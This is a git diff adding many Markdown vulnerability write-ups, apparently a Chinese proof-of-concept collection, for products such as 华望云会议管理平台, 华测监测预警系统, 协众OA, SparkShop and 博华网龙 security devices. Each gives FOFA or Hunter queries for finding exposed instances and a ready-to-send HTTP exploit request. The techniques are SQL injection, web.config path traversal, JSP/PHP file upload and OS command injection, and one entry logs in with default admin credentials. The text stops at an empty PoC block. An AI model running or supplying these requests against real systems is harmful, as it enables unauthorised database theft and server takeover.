+++ b/华望云会议管理平台checkDoubleUserNameForAdd存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 华望云会议管理平台checkDoubleUserNameForAdd存在SQL注入漏洞
+
+华望云会议管理平台checkDoubleUserNameForAdd存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息
+
+## fofa
+
+```kotlin
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+POST /ajax/checkDoubleUserNameForAdd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+
+userName=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'
+```
+
diff --git a/华望云会议管理平台conflog.inc存在SQL注入漏洞.md b/华望云会议管理平台conflog.inc存在SQL注入漏洞.md
new file mode 100644
index 0000000..dcf886b
--- /dev/null
+++ b/华望云会议管理平台conflog.inc存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 华望云会议管理平台conflog.inc存在SQL注入漏洞
+
+华望云会议管理平台 `conflog.inc` 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+POST /page/conflog.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'&params[]=confName&params[]=confId&selectTime=1 HTTP/1.1
+Host: 
+Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+X-Requested-With: XMLHttpRequest
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+```
+
diff --git a/华望云会议管理平台confmanger.inc存在SQL注入漏洞.md b/华望云会议管理平台confmanger.inc存在SQL注入漏洞.md
new file mode 100644
index 0000000..30f0a3e
--- /dev/null
+++ b/华望云会议管理平台confmanger.inc存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 华望云会议管理平台confmanger.inc存在SQL注入漏洞
+
+华望云会议管理平台 `confmanger.inc` 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+POST /page/confmanger.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'&params[]=confName&params[]=confId&params[]=displayName HTTP/1.1
+Host: 
+X-Requested-With: XMLHttpRequest
+Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: */*
+```
+
diff --git a/华望云会议管理平台deptactionlist存在SQL注入漏洞.md b/华望云会议管理平台deptactionlist存在SQL注入漏洞.md
new file mode 100644
index 0000000..0d0c8f0
--- /dev/null
+++ b/华望云会议管理平台deptactionlist存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 华望云会议管理平台deptactionlist存在SQL注入漏洞
+
+华望云会议管理平台 `deptactionlist` 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+POST /page/deptactionlist?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'&dpId=1&params[]=dpName&params[]=dpId HTTP/1.1
+Host: 
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+```
+
+![6c237de2647241b88da8985fa11e6dff.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132246419.png)
\ No newline at end of file
diff --git a/华望云会议管理平台myconflist.in存在SQL注入漏洞.md b/华望云会议管理平台myconflist.in存在SQL注入漏洞.md
new file mode 100644
index 0000000..caf0edd
--- /dev/null
+++ b/华望云会议管理平台myconflist.in存在SQL注入漏洞.md
@@ -0,0 +1,24 @@
+# 华望云会议管理平台myconflist.in存在SQL注入漏洞
+
+华望云会议管理平台 `myconflist.in` 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+GET /page/myconflist.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'&params[]=confName&params[]=confId&selectTime=1 HTTP/1.1
+Host: 
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+X-Requested-With: XMLHttpRequest
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Cookie: uid=112; 获取到的cookie languageGlobal=1
+```
+
+![ed5c1a12018c4e1a862263ac386838f5.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132247707.png)
\ No newline at end of file
diff --git a/华望云会议管理平台recodemanger.inc存在SQL注入漏洞.md b/华望云会议管理平台recodemanger.inc存在SQL注入漏洞.md
new file mode 100644
index 0000000..bfb25f3
--- /dev/null
+++ b/华望云会议管理平台recodemanger.inc存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 华望云会议管理平台recodemanger.inc存在SQL注入漏洞
+
+华望云会议管理平台 `recodemanger.inc` 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+POST /page/recodemanger.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'&params[]=nName&params[]=confName&params[]=displayName&params[]=status&selectTime=1 HTTP/1.1
+Host: 
+Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+```
+
diff --git a/华望云会议管理平台recodemangerForUser.inc存在SQL注入漏洞.md b/华望云会议管理平台recodemangerForUser.inc存在SQL注入漏洞.md
new file mode 100644
index 0000000..6afafa7
--- /dev/null
+++ b/华望云会议管理平台recodemangerForUser.inc存在SQL注入漏洞.md
@@ -0,0 +1,24 @@
+# 华望云会议管理平台recodemangerForUser.inc存在SQL注入漏洞
+
+华望云会议管理平台 `recodemangerForUser.inc` 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+POST /page/recodemangerForUser.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'&params[]=nName&params[]=confName&params[]=displayName&params[]=status&selectTime=1 HTTP/1.1
+Host: 
+Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+```
+
+![93b1d1d9d0b14cf1b9ddedc313f2fa8d.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132244574.png)
\ No newline at end of file
diff --git a/华望云会议管理平台syslog.inc存在SQL注入漏洞.md b/华望云会议管理平台syslog.inc存在SQL注入漏洞.md
new file mode 100644
index 0000000..f241bbd
--- /dev/null
+++ b/华望云会议管理平台syslog.inc存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 华望云会议管理平台syslog.inc存在SQL注入漏洞
+
+华望云会议管理平台 `syslog.inc` 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+```javascript
+POST /page/syslog.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'&params[]=displayName&params[]=module&params[]=act&params[]=ip&selectTime=1 HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+```
+
diff --git a/华望云会议管理平台useractionlist存在SQL注入漏洞.md b/华望云会议管理平台useractionlist存在SQL注入漏洞.md
new file mode 100644
index 0000000..7eb9fd5
--- /dev/null
+++ b/华望云会议管理平台useractionlist存在SQL注入漏洞.md
@@ -0,0 +1,43 @@
+# 华望云会议管理平台useractionlist存在SQL注入漏洞
+
+华望云会议管理平台 `useractionlist` 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="华望云会议管理平台"
+```
+
+## poc
+
+获取cookie
+
+```javascript
+POST /ajax/userlogin HTTP/1.1
+Host: 
+Accept: */*
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+X-Requested-With: XMLHttpRequest
+
+userNameCopy=admin&userName=admin&passWordCopy=admin&passWord=21232f297a57a5a743894a0e4a801fc3
+```
+
+将获取到cookie填入下面poc中
+
+```javascript
+POST /page/useractionlist?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'&dpId=1&params[]=displayName&params[]=userName HTTP/1.1
+Host: 
+X-Requested-With: XMLHttpRequest
+Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+```
+
+![e034ce0d97d2420ea913de1498bfe951.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132251636.png)
+
+![1b610ed8f77245f99e98203c9b8c2f1b.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132249981.png)
\ No newline at end of file
diff --git a/华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞.md b/华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞.md
new file mode 100644
index 0000000..949ebc8
--- /dev/null
+++ b/华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞.md
@@ -0,0 +1,29 @@
+# 华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞
+
+华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞，通过读取配置文件获取重要数据。
+
+## fofa
+
+```jade
+app="华测监测预警系统2.2"
+```
+
+```javascript
+icon_hash="-628229493"
+```
+
+## poc
+
+```javascript
+POST /Handler/FileDownLoad.ashx HTTP/1.1
+Host: ip:port
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 40
+
+filename=1&filepath=../../web.config
+```
+
diff --git a/华测监测预警系统任意文件读取漏洞.md b/华测监测预警系统任意文件读取漏洞.md
new file mode 100644
index 0000000..d0caebf
--- /dev/null
+++ b/华测监测预警系统任意文件读取漏洞.md
@@ -0,0 +1,37 @@
+# 华测监测预警系统任意文件读取漏洞
+
+# 一、漏洞简介
+华测监测预警系统`FileDownload.ashx`存在任意文件读取漏洞。
+
+# 二、影响版本
++ 华测监测预警系统
+
+# 三、资产测绘
++ hunter`app.name="华测监测预警系统"`
++ 登录页面
+
+![1693923282566-a270faa1-3ae7-4bcd-9795-dba9dbe4ae6d.png](./img/WAOjDbmD35pXUcus/1693923282566-a270faa1-3ae7-4bcd-9795-dba9dbe4ae6d-950460.png)
+
+# 四、漏洞复现
+```plain
+POST /Handler/FileDownLoad.ashx HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ASP.NET_SessionId=xp2shqaformcuin4cdxhm3ws
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 40
+
+filename=1&filepath=..%2F..%2Fweb.config
+```
+
+![1693923344252-dbf6f445-b43a-4d97-b79b-f4755c3d42a3.png](./img/WAOjDbmD35pXUcus/1693923344252-dbf6f445-b43a-4d97-b79b-f4755c3d42a3-713801.png)
+
+
+
+> 更新: 2024-02-29 23:55:47  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rcvtzuhecd5rgas8>
\ No newline at end of file
diff --git a/华测监测预警系统数据库信息泄露漏洞.md b/华测监测预警系统数据库信息泄露漏洞.md
new file mode 100644
index 0000000..1a62de0
--- /dev/null
+++ b/华测监测预警系统数据库信息泄露漏洞.md
@@ -0,0 +1,33 @@
+# 华测监测预警系统数据库信息泄露漏洞
+
+# 一、漏洞简介
+华测监测预警系统存在数据库信息泄漏漏洞。
+
+# 二、影响版本
++ 华测监测预警系统
+
+# 三、资产测绘
++ hunter`app.name="华测监测预警系统"`
++ 登录页面
+
+![1693923282566-a270faa1-3ae7-4bcd-9795-dba9dbe4ae6d.png](./img/rSk_-194Dns3L8Y8/1693923282566-a270faa1-3ae7-4bcd-9795-dba9dbe4ae6d-646673.png)
+
+# 四、漏洞复现
+```plain
+GET /web/Report/Rpt/Config/Config.xml HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ASP.NET_SessionId=xp2shqaformcuin4cdxhm3ws
+Upgrade-Insecure-Requests: 1
+```
+
+![1693923526902-2843a031-70e7-4efe-8273-980564d9c277.png](./img/rSk_-194Dns3L8Y8/1693923526902-2843a031-70e7-4efe-8273-980564d9c277-781161.png)
+
+
+
+> 更新: 2024-02-29 23:55:47  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/axm90eqn4qtnt32s>
\ No newline at end of file
diff --git a/协众OA系统接口checkLoginQrCode存在SQL注入漏洞复现.md b/协众OA系统接口checkLoginQrCode存在SQL注入漏洞复现.md
new file mode 100644
index 0000000..6bab9b6
--- /dev/null
+++ b/协众OA系统接口checkLoginQrCode存在SQL注入漏洞复现.md
@@ -0,0 +1,25 @@
+# 协众OA系统接口checkLoginQrCode存在SQL注入漏洞复现
+
+协众OA checkLoginQrCode 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+app="协众软件-协众OA"
+```
+
+## poc
+```javascript
+POST /index.php?app=main&func=common&action=commonJob&act=checkLoginQrCode HTTP/1.1
+Host: 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Priority: u=0, i
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+
+id=(select * from (select sleep(5))z)
+```
+
+![image-20241219150543058](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191505120.png)
\ No newline at end of file
diff --git a/卓软计量业务管理平台image.ashx任意文件读取漏洞.md b/卓软计量业务管理平台image.ashx任意文件读取漏洞.md
new file mode 100644
index 0000000..95d1107
--- /dev/null
+++ b/卓软计量业务管理平台image.ashx任意文件读取漏洞.md
@@ -0,0 +1,19 @@
+# 卓软计量业务管理平台image.ashx任意文件读取漏洞
+
+卓软计量业务管理平台 image.ashx 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+```javascript
+icon_hash="-334571363"
+```
+
+## poc
+```javascript
+GET /HuameiMeasure/image.ashx?image_path=./../web.config HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![image-20241227214332200](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272143297.png)
\ No newline at end of file
diff --git a/南京博纳睿通软件科技有限公司医院一站式后勤管理系统processApkUpload存在任意文件上传漏洞.md b/南京博纳睿通软件科技有限公司医院一站式后勤管理系统processApkUpload存在任意文件上传漏洞.md
new file mode 100644
index 0000000..268fab2
--- /dev/null
+++ b/南京博纳睿通软件科技有限公司医院一站式后勤管理系统processApkUpload存在任意文件上传漏洞.md
@@ -0,0 +1,46 @@
+# 南京博纳睿通软件科技有限公司医院一站式后勤管理系统processApkUpload存在任意文件上传漏洞
+
+# 一、漏洞简介
+医院后勤综合管理平台(Hospital Logistics Management Platform，以下简称HLMP)基于现代医院后勤管理理念，结合后勤业务管理特点，通过管理平台将后勤管理业务予以系统化、规范化和流程化，从而形成一套构建于平台之上且成熟完善的后勤管理体系，并可在此体系上充分挖掘管理潜力，以提高工作效率、加强有效沟通、降低管理成本、辅助管理决策。 南京博纳睿通软件科技有限公司医院后勤保障管理系统processApkUpload存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 南京博纳睿通软件科技有限公司医院后勤保障管理系统
+
+# 三、资产测绘
++ fofa`body="frameworkModuleJob" `
++ 特征
+
+![1711205380423-60b78e14-9101-4ae8-8a9d-bd2b7c184593.png](./img/Z1w4oHFdZ1FH_2QG/1711205380423-60b78e14-9101-4ae8-8a9d-bd2b7c184593-320960.png)
+
+# 四、漏洞复现
+```plain
+POST /ajaxinvoke/frameworkModuleJob.processApkUpload.upload HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Content-Type: multipart/form-data; boundary=00content0boundary00
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Length: 197
+
+--00content0boundary00
+Content-Disposition: form-data; name="Filedata"; filename="stc.jsp"
+Content-Type: application/octet-stream
+
+<% out.println("123");%>
+--00content0boundary00--
+```
+
+![1711211118920-85b8938f-02a2-4ef6-b68d-35c00b5edf78.png](./img/Z1w4oHFdZ1FH_2QG/1711211118920-85b8938f-02a2-4ef6-b68d-35c00b5edf78-868233.png)
+
+根据响应获取上传文件位置
+
+```plain
+/apk/33/stc.jsp
+```
+
+![1711211148919-d8550b80-ea67-4bff-908d-2d214c4adc9a.png](./img/Z1w4oHFdZ1FH_2QG/1711211148919-d8550b80-ea67-4bff-908d-2d214c4adc9a-945275.png)
+
+
+
+> 更新: 2024-04-20 22:05:29  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/az2vflngvgmzr9ew>
\ No newline at end of file
diff --git a/南京星源图科技SparkShop存在任意文件上传漏洞.md b/南京星源图科技SparkShop存在任意文件上传漏洞.md
new file mode 100644
index 0000000..fc3c317
--- /dev/null
+++ b/南京星源图科技SparkShop存在任意文件上传漏洞.md
@@ -0,0 +1,44 @@
+# 南京星源图科技SparkShop存在任意文件上传漏洞
+
+南京星源图科技SparkShop商城存在任意文件上传漏洞，攻击者可获取服务器权限。
+
+## fofa
+
+```yaml
+"SparkShop"
+```
+
+## poc
+
+```java
+POST /api/Common/uploadFile HTTP/2
+Host: 
+Cache-Control: max-age=0
+Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "macOS"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Priority: u=0, i
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
+Content-Length: 178
+
+------WebKitFormBoundaryj7OlOPiiukkdktZR
+Content-Disposition: form-data; name="file";filename="1.php"
+
+<?php echo"hello world";?>
+------WebKitFormBoundaryj7OlOPiiukkdktZR--
+```
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/xrdAT9NE6Z5s7OoiJdnd-w
\ No newline at end of file
diff --git a/博华网龙安全设备cmd.php远程命令执行漏洞.md b/博华网龙安全设备cmd.php远程命令执行漏洞.md
new file mode 100644
index 0000000..b176bc2
--- /dev/null
+++ b/博华网龙安全设备cmd.php远程命令执行漏洞.md
@@ -0,0 +1,37 @@
+# 博华网龙安全设备cmd.php远程命令执行漏洞
+
+# 一、漏洞简介
+中科博华是一家集科研、产品开发、技术服务、系统集成为一体的高科技企业，是国家商用密码产品定点生产单位，具有商用密码生产和销售许可证、3C认证、系统集成叁级资质、信息安全服务一级资质和涉密资质等。中科博华多个安全设备系统存在远程代码执行漏洞，攻击者通过漏洞可以获取服务器权限。
+
+# 二、影响版本
++ 博华网龙防火墙
++ 博华网龙信息安全一体机
++ 博华网龙安全网关
+
+# 三、资产测绘
++ hunter`web.title="博华网龙"`
++ 特征
+
+![1696566856436-c5c98016-9190-4ff0-a67e-becd89d83102.png](./img/Yaw0bhzWq8eQpP9I/1696566856436-c5c98016-9190-4ff0-a67e-becd89d83102-746962.png)
+
+# 四、漏洞复现
+**poc1:**
+
+```plain
+/diagnostics/cmd.php?action=arping&ifName=|id||
+```
+
+![1696566921516-95ed8ce9-77e0-4146-bdc6-63c346ac5baf.png](./img/Yaw0bhzWq8eQpP9I/1696566921516-95ed8ce9-77e0-4146-bdc6-63c346ac5baf-114102.png)
+
+**poc2:**
+
+```plain
+/diagnostics/cmd.php?action=ping&count=||id||
+```
+
+![1696566937647-b84f3c0a-7dc7-48e4-a1c4-c3c3b87510cc.png](./img/Yaw0bhzWq8eQpP9I/1696566937647-b84f3c0a-7dc7-48e4-a1c4-c3c3b87510cc-081162.png)
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ognnq9azp0fodi9b>
\ No newline at end of file
diff --git a/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md b/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md
new file mode 100644
index 0000000..fe28031
--- /dev/null
+++ b/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 博斯外贸管理软件logined.jsp存在SQL注入漏洞
+
+博斯外贸管理软件V6.0 logined.jsp 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+```javascript
+title="欢迎使用 博斯软件"
+```
+
+## poc
+```javascript
+POST /log/logined.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+
+Submit=-1&account=-1&password=1%27+AND+9085+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%289085%3D9085%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29+AND+%27GSSe%27%3D%27GSSe
+```
+
+![image-20241227215420546](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272154610.png)
\ No newline at end of file
diff --git a/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md b/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md
new file mode 100644
index 0000000..c09dc9e
--- /dev/null
+++ b/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 博斯外贸管理软件loginednew.jsp存在SQL注入漏洞
+
+博斯外贸管理软件V6.0 loginednew.jsp 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+```javascript
+title="欢迎使用 博斯软件"
+```
+
+## poc
+```javascript
